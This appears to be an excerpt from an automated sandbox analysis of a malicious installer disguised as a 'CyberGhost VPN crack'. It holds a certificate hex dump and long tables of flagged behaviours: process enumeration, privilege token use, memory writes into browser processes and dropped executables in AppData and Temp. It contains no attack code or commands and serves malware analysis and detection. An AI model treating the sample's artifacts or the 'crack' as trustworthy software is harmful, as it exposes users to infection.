e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5264 wrote to memory of 4768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
